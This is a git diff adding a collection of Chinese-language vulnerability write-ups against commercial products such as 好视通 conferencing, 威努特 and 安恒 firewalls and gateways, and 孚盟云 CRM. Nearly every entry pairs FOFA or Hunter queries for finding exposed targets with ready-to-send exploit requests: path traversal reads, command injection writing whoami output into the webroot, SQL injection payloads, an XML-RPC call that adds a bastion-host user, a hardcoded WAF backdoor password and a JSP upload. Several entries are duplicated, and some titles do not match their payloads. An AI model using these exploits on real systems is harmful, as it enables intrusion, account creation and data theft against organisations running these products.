+Content-Type: application/octet-stream
+ 
+<% out.print("dudesuite"); %>
+--1515df1sdfdsfddfs--
+```
+
+文件路径`/fm/upload/dudesuite.jsp`
+
diff --git a/好视通视频会议系统-toDownload.do接口-任意文件读取漏洞.md b/好视通视频会议系统-toDownload.do接口-任意文件读取漏洞.md
new file mode 100644
index 0000000..48027c3
--- /dev/null
+++ b/好视通视频会议系统-toDownload.do接口-任意文件读取漏洞.md
@@ -0,0 +1,18 @@
+## 好视通视频会议系统 toDownload.do接口任意文件读取漏洞
+好视通 是国内云视频会议知名品牌，拥有多项创新核心技术优势、多方通信服务牌照及行业全面资质 ，专注为政府、公检法司、教育、集团企业等用户提供“云+端+业务全场景”解决方案。其视频会议系统的路径(fastmeeting) /register/toDownload.do?fileName= 存在任意文件遍历漏洞，可通过fileName参数读取任意文件。 
+
+弱口令admin/admin
+
+## fofa
+```
+"深圳银澎云计算有限公司"
+```
+
+## poc
+```
+/register/toDownload.do?fileName=敏感文件路径
+https://xxxxxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
+
+```
+
+
diff --git a/好视通视频会议系统存在任意文件读取漏洞.md b/好视通视频会议系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..719ac5b
--- /dev/null
+++ b/好视通视频会议系统存在任意文件读取漏洞.md
@@ -0,0 +1,26 @@
+# 好视通视频会议系统存在任意文件读取漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(51, 51, 51);">好视通视频会议是由深圳市华视瑞通信息技术有限公司开发，其在国内率先推出了3G互联网视频会议，并成功应用于SAAS领域。好视通视频会议系统存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。</font>
+
+# <font style="color:rgb(51, 51, 51);">二、影响版本</font>
++ 好视通视频会议系统
+
+# 三、资产测绘
++ hunter`app.name="好视通 Server Management System"`
++ 特征![1700702275984-2d23da89-0111-4006-a5ce-874a3a2d9fd8.png](./img/SGtAAjB6Vw--6aV5/1700702275984-2d23da89-0111-4006-a5ce-874a3a2d9fd8-049119.png)
+
+# 四、漏洞复现
+```python
+GET /register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Length: 0
+```
+
+![1700702314990-271b30ee-3c76-46b3-8671-216dcfaf4416.png](./img/SGtAAjB6Vw--6aV5/1700702314990-271b30ee-3c76-46b3-8671-216dcfaf4416-185423.png)
+
+
+
+> 更新: 2024-02-29 23:55:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gsb2m9xvhebci1ix>
\ No newline at end of file
diff --git a/威努特sslvpn_client存在远程命令执行漏洞.md b/威努特sslvpn_client存在远程命令执行漏洞.md
new file mode 100644
index 0000000..5cef73a
--- /dev/null
+++ b/威努特sslvpn_client存在远程命令执行漏洞.md
@@ -0,0 +1,44 @@
+# 威努特sslvpn_client存在远程命令执行漏洞
+
+# 一、漏洞简介
+威努特防火墙sslvpn_client存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 威努特第二代防火墙
++ 威努特上网行为管理系统
+
+# 三、资产测绘
++ hunter`app.name=="威努特第二代防火墙"`
++ 特征
+
+![1701763255220-b1f2801a-99cf-4b00-908a-e0407077d750.png](./img/r7gYetii6UGZxE7M/1701763255220-b1f2801a-99cf-4b00-908a-e0407077d750-805088.png)
+
+![1701763267244-47dfc2c5-8543-4eba-81fc-85757181229a.png](./img/r7gYetii6UGZxE7M/1701763267244-47dfc2c5-8543-4eba-81fc-85757181229a-036372.png)
+
+# 四、漏洞复现
+```java
+GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/r7gYetii6UGZxE7M/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-569947.png)
+
+获取命令执行结果
+
+```java
+GET /sslvpn/ceshi.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/r7gYetii6UGZxE7M/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-186116.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qg31v0mn53x3w50g>
\ No newline at end of file
diff --git a/孚盟云AjaxMethod.ashxSQL注入漏洞.md b/孚盟云AjaxMethod.ashxSQL注入漏洞.md
new file mode 100644
index 0000000..2e37259
--- /dev/null
+++ b/孚盟云AjaxMethod.ashxSQL注入漏洞.md
@@ -0,0 +1,27 @@
+# 孚盟云AjaxMethod.ashx SQL注入漏洞
+
+# 一、漏洞简介
+孚盟与阿里强强联手将最受青睐的经典C系列产品打造成全新的孚盟云产品，让用户可以用云模式实现信息化管理，让用户的异地办公更加流畅，大大降低中小企业在信息化上成本，用最小的投入享受大型企业级别的信息化服务，使中小企业在网络硬件环境、内部贸易过程管理与快速通关形成一套完整解决方案。
+
+# 二、影响版本
++ 孚盟云CRM
+
+# 三、资产测绘
++ hunter`app.name="孚盟云 CRM"`
++ 登录页面
+
+![1693927610010-b856fdb9-d5da-4a65-b0c3-197c665b1d44.png](./img/3TX-gi-rq43CrYKh/1693927610010-b856fdb9-d5da-4a65-b0c3-197c665b1d44-038131.png)
+
+# 四、漏洞复现
+```plain
+/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=1
+```
+
+![1693927659635-ea1af5b1-5f90-4a5f-b9d9-98420438bc7e.png](./img/3TX-gi-rq43CrYKh/1693927659635-ea1af5b1-5f90-4a5f-b9d9-98420438bc7e-610567.png)
+
+![1693928003514-3c2d3a36-6df6-45a5-972e-13703a75416f.png](./img/3TX-gi-rq43CrYKh/1693928003514-3c2d3a36-6df6-45a5-972e-13703a75416f-294343.png)
+
+
+
+> 更新: 2024-02-29 23:55:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xubb5blcky307d56>
\ No newline at end of file
diff --git a/孚盟云系统接口MailAjax.ashx存在SQL注入漏洞.md b/孚盟云系统接口MailAjax.ashx存在SQL注入漏洞.md
new file mode 100644
index 0000000..2692364
--- /dev/null
+++ b/孚盟云系统接口MailAjax.ashx存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 孚盟云系统接口MailAjax.ashx存在SQL注入漏洞
+
+孚盟云系统接口MailAjax.ashx存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+app="孚盟软件-孚盟云"
+```
+
+## poc
+
+```javascript
+POST /Ajax/MailAjax.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: UserCookie={"LicNo":"","lastLoginIp":"","LicSelected":"cloud","ProductID":"M8","loginUser":"00210","userToken":"A39418D1C5EADEFD41E99B71976A531E24EC2C6B9E7D4CD460A406769A97CC9DE2966975679C521F499A8F215B51B65C4D067F57D94D260B6EF4C16094D56562"}
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+action=GetMailContactsCard&custFID=%28SELECT%20CHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%287588%3D7588%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28107%29%2BCHAR%28113%29%29
+```
+
diff --git a/孚盟云系统接口ajaxsenddingdingmessage存在SQL注入漏洞.md b/孚盟云系统接口ajaxsenddingdingmessage存在SQL注入漏洞.md
new file mode 100644
index 0000000..5a6ca13
--- /dev/null
+++ b/孚盟云系统接口ajaxsenddingdingmessage存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 孚盟云系统接口ajaxsenddingdingmessage存在SQL注入漏洞
+
+孚盟云系统接口ajaxsenddingdingmessage存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+body="hidLicResult" && body="hidProductID"
+```
+
+## poc
+
+```javascript
+POST /m/Dingding/Ajax/AjaxSendDingdingMessage.ashx HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15X-Requested-With: XMLHttpRequest
+Content-Length: 51
+
+action=SendDingMeg_Mail&empId=2'+and+1=@@VERSION--+
+```
+
+![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272016507.jpeg)
\ No newline at end of file
diff --git a/安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞.md b/安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞.md
new file mode 100644
index 0000000..53ac8a0
--- /dev/null
+++ b/安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞.md
@@ -0,0 +1,33 @@
+# 安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞
+
+# 一、漏洞简介
+安徽生命港湾信息技术有限公司，成立于2020年7月。以“产品+解决方案+服务”引领技术、运营模式创新，是以楼宇自控产品（BA)、软件平台(IBMS)、数字建筑、物联网系统(AIoT)为核心技术驱动的创新型技术企业，致力于智慧建筑、物联网系统产品研发、制造，产品涵盖IBMS平台软件、边缘计算网关、物联网数据中台、楼宇自控设备、执行器、传感器等。凭借技术团队多年的行业耕耘及深入场景的产品设计和创新，以IBMS为可视化运维管理平台，将物联网数据采集、大数据与IBMS融合，实现安防、医疗、楼宇自控、能源、园区、环境、城市、应急等智慧控制管理功能，为医院、园区、教育、政务、轨道交通等行业提供智慧建筑全生态解决方案。安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞
+
+# 二、影响版本
++ 服务配置工具
+
+# 三、资产测绘
++ fofa：`body="css/markdown.css" && body="icon-512.png"`
++ 特征
+
+![1733591983248-8301dd73-b583-47cd-aacc-864c5214c282.png](./img/PNMBjNOeHcnDPE9f/1733591983248-8301dd73-b583-47cd-aacc-864c5214c282-414402.png)
+
+# 四、漏洞复现
+```java
+GET /api/File/Download?file=../web.config HTTP/1.1
+Host: 
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+
+```
+
+![1733592027293-51775f39-1fc6-48dc-8b13-194bf5dba413.png](./img/PNMBjNOeHcnDPE9f/1733592027293-51775f39-1fc6-48dc-8b13-194bf5dba413-711997.png)
+
+
+
+> 更新: 2024-12-20 14:53:54  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zd3swwh4v3saweol>
\ No newline at end of file
diff --git a/安恒下一代防火墙存在命令执行漏洞.md b/安恒下一代防火墙存在命令执行漏洞.md
new file mode 100644
index 0000000..618895b
--- /dev/null
+++ b/安恒下一代防火墙存在命令执行漏洞.md
@@ -0,0 +1,117 @@
+# 安恒下一代防火墙存在命令执行漏洞
+
+# 一、漏洞简介
+安恒明御运维审计与风险控制系统（简称“DASUSM”）是一款基于运维安全管理的理论和实践经验，结合各类法律法规（如等级保护、赛班斯法案SOX、PCI、企业内控管理、分级保护、ISO/IEC 27001等）对运维审计的要求，采用B/S架构，集“身份认证（Authentication）、账户管理（Account）、控制权限（Authorization）、日志审计（Audit）”于一体，支持多种字符终端协议、文件传输协议、图形终端协议、远程应用协议的安全监控与历史查询，具备全方位运维风险控制能力的统一安全管理与审计产品。安恒明御运维审计风险控制系统（堡垒机）存在任意用户添加漏洞，攻击者可利用该漏洞添加用户登录堡垒机。
+
+# 二、影响版本
++ 安恒明御运维审计与风险控制系统
+
+# 三、资产测绘
++ hunter:`app.name=="安恒明御运维审计与风险控制系统"`
+
+![1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44.png](./img/_Zxcf_M89e3_ahWJ/1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44-982106.png)
+
++ 首页
+
+![1691393366555-3c70041c-447d-415f-a6e6-bd852a153318.png](./img/_Zxcf_M89e3_ahWJ/1691393366555-3c70041c-447d-415f-a6e6-bd852a153318-123751.png)
+
+# 四、漏洞复现
+使用exp添加用户`qaxnb666/Admin123..`
+
+```java
+POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Length: 1112
+
+<?xml version="1.0"?>
+<methodCall>
+<methodName>web.user_add</methodName>
+<params>
+<param>
+<value>
+<array>
+<data>
+<value>
+<string>admin</string>
+</value>
+<value>
+<string>5</string>
+</value>
+<value>
+<string>10.17.1.1</string>
+</value>
+</data>
+</array>
+</value>
+</param>
+<param>
+<value>
+<struct>
+<member>
+<name>uname</name>
+<value>
+<string>qaxnb666</string>
+</value>
+</member>
+<member>
+<name>name</name>
+<value>
+<string>yuwe</string>
+</value>
+</member>
+<member>
+<name>pwd</name>
+<value>
+<string>Admin123..</string>
+</value>
+</member>
+<member>
+<name>authmode</name>
+<value>
+<string>1</string>
+</value>
+</member>
+<member>
+<name>deptid</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>email</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>mobile</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>comment</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>roleid</name>
+<value>
+<string>101</string>
+</value>
+</member>
+</struct></value>
+</param>
+</params>
+</methodCall>
+```
+
+![1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378.png](./img/_Zxcf_M89e3_ahWJ/1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378-918576.png)
+
+![1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9.png](./img/_Zxcf_M89e3_ahWJ/1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9-919588.png)
+
+
+
+> 更新: 2024-07-17 17:36:22  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/no2fqia6mfaidmur>
\ No newline at end of file
diff --git a/安恒堡垒机任意用户添加漏洞.md b/安恒堡垒机任意用户添加漏洞.md
new file mode 100644
index 0000000..7df69ad
--- /dev/null
+++ b/安恒堡垒机任意用户添加漏洞.md
@@ -0,0 +1,117 @@
+# 安恒堡垒机任意用户添加漏洞
+
+# 一、漏洞简介
+安恒明御运维审计与风险控制系统（简称“DASUSM”）是一款基于运维安全管理的理论和实践经验，结合各类法律法规（如等级保护、赛班斯法案SOX、PCI、企业内控管理、分级保护、ISO/IEC 27001等）对运维审计的要求，采用B/S架构，集“身份认证（Authentication）、账户管理（Account）、控制权限（Authorization）、日志审计（Audit）”于一体，支持多种字符终端协议、文件传输协议、图形终端协议、远程应用协议的安全监控与历史查询，具备全方位运维风险控制能力的统一安全管理与审计产品。安恒明御运维审计风险控制系统（堡垒机）存在任意用户添加漏洞，攻击者可利用该漏洞添加用户登录堡垒机。
+
+# 二、影响版本
++ 安恒明御运维审计与风险控制系统
+
+# 三、资产测绘
++ hunter:`app.name=="安恒明御运维审计与风险控制系统"`
+
+![1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44.png](./img/cmq6DHY7F_D9I14C/1691393320775-2fcf53cd-f670-4d22-a04e-ae7f76d4cb44-574865.png)
+
++ 首页
+
+![1691393366555-3c70041c-447d-415f-a6e6-bd852a153318.png](./img/cmq6DHY7F_D9I14C/1691393366555-3c70041c-447d-415f-a6e6-bd852a153318-116673.png)
+
+# 四、漏洞复现
+使用exp添加用户`qaxnb666/Admin123..`
+
+```java
+POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1
+Host: xx.xx.xx.xx
+Content-Length: 1112
+
+<?xml version="1.0"?>
+<methodCall>
+<methodName>web.user_add</methodName>
+<params>
+<param>
+<value>
+<array>
+<data>
+<value>
+<string>admin</string>
+</value>
+<value>
+<string>5</string>
+</value>
+<value>
+<string>10.17.1.1</string>
+</value>
+</data>
+</array>
+</value>
+</param>
+<param>
+<value>
+<struct>
+<member>
+<name>uname</name>
+<value>
+<string>qaxnb666</string>
+</value>
+</member>
+<member>
+<name>name</name>
+<value>
+<string>yuwe</string>
+</value>
+</member>
+<member>
+<name>pwd</name>
+<value>
+<string>Admin123..</string>
+</value>
+</member>
+<member>
+<name>authmode</name>
+<value>
+<string>1</string>
+</value>
+</member>
+<member>
+<name>deptid</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>email</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>mobile</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>comment</name>
+<value>
+<string></string>
+</value>
+</member>
+<member>
+<name>roleid</name>
+<value>
+<string>101</string>
+</value>
+</member>
+</struct></value>
+</param>
+</params>
+</methodCall>
+```
+
+![1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378.png](./img/cmq6DHY7F_D9I14C/1691393678758-f523c4a1-eb67-42fb-ae42-b3bb5c838378-529529.png)
+
+![1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9.png](./img/cmq6DHY7F_D9I14C/1691393729985-1a6856f8-5697-483e-a696-b7f1f69a28e9-029750.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uw8xn0gy2yh82z2w>
\ No newline at end of file
diff --git a/安恒明御Web应用防火墙任意登录漏洞.md b/安恒明御Web应用防火墙任意登录漏洞.md
new file mode 100644
index 0000000..27c19d1
--- /dev/null
+++ b/安恒明御Web应用防火墙任意登录漏洞.md
@@ -0,0 +1,54 @@
+# 安恒明御Web应用防火墙任意登录漏洞
+
+# 一、漏洞简介
+<font style="color:rgb(36, 41, 46);">安恒 明御WEB应用防火墙 report.php文件存在硬编码设置的Console用户登录</font>
+
+# <font style="color:rgb(36, 41, 46);">二、影响版本</font>
++ <font style="color:rgb(36, 41, 46);">明御 WAF X86 架构 <= 4.6.33</font>
++ <font style="color:rgb(36, 41, 46);">明御 WAF 信创兆芯 = 4.5</font>
++ <font style="color:rgb(36, 41, 46);">明御 WAF 鲲鹏 = 4.6.18</font>
+
+# <font style="color:rgb(36, 41, 46);">三、资产测绘</font>
++ hunter：`app.name="安恒明御 WEB应用防火墙"`
+
+![1691870207684-43773e1e-380f-4b50-97c4-970a85fe15da.png](./img/2T7HQw4oHIy0OLXx/1691870207684-43773e1e-380f-4b50-97c4-970a85fe15da-510345.png)
+
++ 登录页面
+
+![1691870225669-83195d88-a32e-4040-9f1c-2a56c683bc0b.png](./img/2T7HQw4oHIy0OLXx/1691870225669-83195d88-a32e-4040-9f1c-2a56c683bc0b-657075.png)
+
+![1691870232014-cbeb65c6-e392-4ec9-9a10-a412bb88d806.png](./img/2T7HQw4oHIy0OLXx/1691870232014-cbeb65c6-e392-4ec9-9a10-a412bb88d806-158115.png)
+
+# 四、漏洞复现
+1. 访问poc
+
+```plain
+/report.m?a=rpc-timed
+```
+
+![1691870301946-d3891e18-1a97-42d1-b267-b33469f8346c.png](./img/2T7HQw4oHIy0OLXx/1691870301946-d3891e18-1a97-42d1-b267-b33469f8346c-880725.png)
+
+2. <font style="color:rgb(36, 41, 46);">接着删除路径信息，再次访问登录界面就会出现这个界面</font>
+
+![1691870377480-392d2c1d-9a61-49de-9dd7-4238ddede8d1.png](./img/2T7HQw4oHIy0OLXx/1691870377480-392d2c1d-9a61-49de-9dd7-4238ddede8d1-426367.png)![1691870410076-6ce9b3d6-93a4-4520-9df6-de8c21438976.png](./img/2T7HQw4oHIy0OLXx/1691870410076-6ce9b3d6-93a4-4520-9df6-de8c21438976-170796.png)
+
+3. 访问下面这个路径，进入系统设置（不能直接点系统设置），就可以更改SSH的配置了。
+
+```plain
+/system.m?a=reserved
+```
+
+![1691870717826-fb965fdd-ec4c-411d-a116-5e9935289e2b.png](./img/2T7HQw4oHIy0OLXx/1691870717826-fb965fdd-ec4c-411d-a116-5e9935289e2b-731935.png)
+
+4. 在密码框中，输入密码,就可以更改SSH配置,也可查看其他菜单
+
+```plain
+!@#dbapp-waf-dev-reserved#@!
+```
+
+![1691870792270-ff4dc9a2-cce2-4788-9c6a-e704841c90fa.png](./img/2T7HQw4oHIy0OLXx/1691870792270-ff4dc9a2-cce2-4788-9c6a-e704841c90fa-715844.png)
+
+
+
+> 更新: 2024-02-29 23:57:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fg8ocgvc7bpywni4>
\ No newline at end of file
diff --git a/安恒明御安全网关aaa_local_web_preview存在远程命令执行漏洞.md b/安恒明御安全网关aaa_local_web_preview存在远程命令执行漏洞.md
new file mode 100644
index 0000000..66b3102
--- /dev/null
+++ b/安恒明御安全网关aaa_local_web_preview存在远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# 安恒明御安全网关aaa_local_web_preview存在远程命令执行漏洞
+
+# 一、漏洞简介
+安恒信息明御安全网关<font style="color:rgb(0, 0, 0);">（以下简称“NGFW”）秉持安全可视、简单有效的理念，以资产为视角，构建“事前+事中+事后”全流程防御的下一代安全防护体系，并融合传统防火墙、</font>入侵防御系统<font style="color:rgb(0, 0, 0);">、防病毒网关、上网行为管控、VPN网关、威胁情报等</font>安全模块<font style="color:rgb(0, 0, 0);">于一体的智慧化安全网关。安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞。攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 安恒明御安全网关
+
+# 三、资产测绘
++ hunter`app.name="安恒明御安全网关"`
++ 特征
+
+![1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3.png](./img/jAKWW4JqUQbjCmHl/1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3-523650.png)
+
+# 四、漏洞复现
+```plain
+GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd.png](./img/jAKWW4JqUQbjCmHl/1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd-711461.png)
+
+获取命令执行结果
+
+```plain
+GET /sslvpn/stc.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1703405938768-9fa01d85-610c-4b95-a221-8a3363171080.png](./img/jAKWW4JqUQbjCmHl/1703405938768-9fa01d85-610c-4b95-a221-8a3363171080-296297.png)
+
+
+
+> 更新: 2024-07-17 17:29:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rdf0zo1tk2wbzg3g>
\ No newline at end of file
diff --git a/安恒明御安全网关aaa_portal_auth_config_reset存在远程命令执行漏洞.md b/安恒明御安全网关aaa_portal_auth_config_reset存在远程命令执行漏洞.md
new file mode 100644
index 0000000..b2b2737
--- /dev/null
+++ b/安恒明御安全网关aaa_portal_auth_config_reset存在远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# 安恒明御安全网关aaa_portal_auth_config_reset存在远程命令执行漏洞
+
+# 一、漏洞简介
+安恒信息明御安全网关<font style="color:rgb(0, 0, 0);">（以下简称“NGFW”）秉持安全可视、简单有效的理念，以资产为视角，构建“事前+事中+事后”全流程防御的下一代安全防护体系，并融合传统防火墙、</font>入侵防御系统<font style="color:rgb(0, 0, 0);">、防病毒网关、上网行为管控、VPN网关、威胁情报等</font>安全模块<font style="color:rgb(0, 0, 0);">于一体的智慧化安全网关。安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞。攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 安恒明御安全网关
+
+# 三、资产测绘
++ hunter`app.name="安恒明御安全网关"`
++ 特征
+
+![1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3.png](./img/HWXRZk-Pt7bBvocS/1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3-137994.png)
+
+# 四、漏洞复现
+```plain
+GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd.png](./img/HWXRZk-Pt7bBvocS/1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd-686075.png)
+
+获取命令执行结果
+
+```plain
+GET /sslvpn/stc.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1703405938768-9fa01d85-610c-4b95-a221-8a3363171080.png](./img/HWXRZk-Pt7bBvocS/1703405938768-9fa01d85-610c-4b95-a221-8a3363171080-026969.png)
+
+
+
+> 更新: 2024-07-17 17:22:16  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ggogol4vip7aq8zc>
\ No newline at end of file
diff --git a/安恒明御安全网关aaa_portal_auth_local_submit存在远程命令执行漏洞.md b/安恒明御安全网关aaa_portal_auth_local_submit存在远程命令执行漏洞.md
new file mode 100644
index 0000000..9e858ef
--- /dev/null
+++ b/安恒明御安全网关aaa_portal_auth_local_submit存在远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# 安恒明御安全网关aaa_portal_auth_local_submit存在远程命令执行漏洞
+
+# 一、漏洞简介
+安恒信息明御安全网关<font style="color:rgb(0, 0, 0);">（以下简称“NGFW”）秉持安全可视、简单有效的理念，以资产为视角，构建“事前+事中+事后”全流程防御的下一代安全防护体系，并融合传统防火墙、</font>入侵防御系统<font style="color:rgb(0, 0, 0);">、防病毒网关、上网行为管控、VPN网关、威胁情报等</font>安全模块<font style="color:rgb(0, 0, 0);">于一体的智慧化安全网关。安恒明御安全网关aaa_portal_auth_wchat_submit存在远程命令执行漏洞。攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgb(0, 0, 0);">二、影响版本</font>
++ 安恒明御安全网关
+
+# 三、资产测绘
++ hunter`app.name="安恒明御安全网关"`
++ 特征
+
+![1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3.png](./img/pzDedjkOanQCgUGN/1699939786628-0b13cd03-210c-4d73-9fb2-6198942e15c3-416578.png)
+
+# 四、漏洞复现
+```plain
+GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd.png](./img/pzDedjkOanQCgUGN/1703405909643-3e3d865b-260e-419a-b697-5ed23a0a0ecd-056323.png)
+
+获取命令执行结果
+
+```plain
+GET /sslvpn/stc.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: {hostname}
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
